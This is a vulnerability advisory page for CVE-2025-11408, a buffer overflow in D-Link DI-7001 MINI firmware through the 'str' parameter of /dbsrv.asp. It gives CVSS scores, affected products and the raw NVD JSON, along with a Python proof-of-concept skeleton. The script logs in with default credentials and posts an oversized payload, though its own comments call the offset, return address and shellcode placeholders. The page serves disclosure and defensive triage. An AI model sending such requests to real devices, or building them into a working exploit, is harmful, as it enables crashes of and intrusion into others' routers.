Security Vulnerability Report
CVE-2025-11408 CVSS 8.8 HIGH

CVE-2025-11408

Published: 2025-10-07 21:15:37
Last Modified: 2025-11-19 20:30:11

Description

A security vulnerability has been detected in D-Link DI-7001 MINI firmware 24.04.18B1. It affects an unspecified function behind the file /dbsrv.asp: manipulating the argument "str" leads to a buffer overflow. The attack can be launched remotely. An exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
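CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Note: this is the "Secondary" CVSS 3.1 entry in the raw record below. The same record also carries a "Primary" CVSS 3.1 entry, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 CRITICAL), which assumes no privileges are required. Triage against the higher score unless authentication on /dbsrv.asp has been confirmed.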

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7001mini-8g_firmware:24.04.18b1:*:*:*:*:*:*:* - VULNERABLE
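cpe:2.3:h:dlink:di-7001mini-8g:b1:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry: the raw record combines it with the firmware entry above using AND, i.e. the affected configuration is firmware 24.04.18b1 running on this hardware)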
D-Link DI-7001 MINI firmware 24.04.18B1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
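# CVE-2025-11408 - D-Link DI-7001 MINI Buffer Overflow PoC
# Vulnerability: Buffer overflow in /dbsrv.asp via 'str' parameter
# Affected: D-Link DI-7001 MINI firmware 24.04.18B1
#
# NOTE(review): this listing is a skeleton, not a verified exploit. The
# padding length, return address and "shellcode" are placeholders, and the
# login path and form field names are not confirmed against the firmware.
# The most it can demonstrate is that an oversized 'str' value is accepted
# by /dbsrv.asp. For defenders the useful takeaway is the request shape:
# a POST to /dbsrv.asp with an unusually long 'str' field is worth alerting
# on, and the management interface should not be reachable from untrusted
# networks.
import requests
import sys

# Placeholder documenting the affected endpoint. It is a full URL, whereas
# exploit() expects a bare host, so it must not be passed as `target`.
TARGET_URL = "http://<target_ip>/dbsrv.asp"
USERNAME = "admin"
PASSWORD = "password"


def exploit(target, username, password):
    """Send an oversized 'str' value to /dbsrv.asp on a lab device.

    Args:
        target: Host (optionally ``host:port``) of the device under test.
            It is interpolated into ``http://{target}/...``, so it must not
            carry a scheme or a path.
        username: Account used for the login request.
        password: Password for that account.

    Returns:
        None. Progress and errors are printed to stdout.
    """
    session = requests.Session()

    # Step 1: log in first. The page's CVSS 3.1 vector lists PR:L, i.e. a
    # low-privilege session is assumed to be required.
    login_url = f"http://{target}/login.asp"
    login_data = {
        "username": username,
        "password": password,
    }
    try:
        # NOTE(review): the response is not inspected, so a returned page
        # does not prove the login was accepted - confirm on the lab device.
        session.post(login_url, data=login_data, timeout=10)
    except requests.exceptions.RequestException as e:
        # A failed login request is an error, not a positive result; the
        # follow-up request would only repeat the same connection failure.
        print(f"[-] Authentication request failed: {e}")
        return

    # Step 2: build the oversized value for 'str'. Every component here is
    # a placeholder taken unchanged from the page; none is derived from
    # analysis of the firmware.
    padding = b"A" * 256  # placeholder length, not a measured offset
    ret_address = b"\x41\x41\x41\x41"  # placeholder, not a real address
    shellcode = b"\x90" * 100  # filler bytes only; no code is carried
    payload = padding + ret_address + shellcode

    # Step 3: send the request to the affected endpoint.
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0",
    }
    data = {
        "str": payload.decode('latin-1'),
    }
    try:
        response = session.post(
            f"http://{target}/dbsrv.asp",
            data=data,
            headers=headers,
            timeout=10,
        )
        print(f"[+] Payload sent. Status: {response.status_code}")
    except requests.exceptions.Timeout:
        # A timeout is inconclusive: a hung service, packet loss and
        # filtering all look the same from the client side. Check the
        # device console or logs before drawing a conclusion.
        print("[!] Request timed out - inconclusive, check the device state")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    # Require an explicit host. The previous fallback passed TARGET_URL
    # (a full URL containing a placeholder) into exploit(), which produced
    # a malformed "http://http://..." address.
    if len(sys.argv) < 2:
        raise SystemExit(f"usage: {sys.argv[0]} <host[:port]>")
    exploit(sys.argv[1], USERNAME, PASSWORD)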

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11408", "sourceIdentifier": "[email protected]", "published": "2025-10-07T21:15:37.480", "lastModified": "2025-11-19T20:30:10.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in D-Link DI-7001 MINI 24.04.18B1. The affected element is an unknown function of the file /dbsrv.asp. Such manipulation of the argument str leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7001mini-8g_firmware:24.04.18b1:*:*:*:*:*:*:*", 
"matchCriteriaId": "98F1181A-9265-4808-9983-8BF8B769D277"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7001mini-8g:b1:*:*:*:*:*:*:*", "matchCriteriaId": "B6AFB9DF-DE81-4481-8D9A-0BA4B76AD606"}]}]}], "references": [{"url": "https://github.com/DavCloudz/cve/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327345", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327345", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665474", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}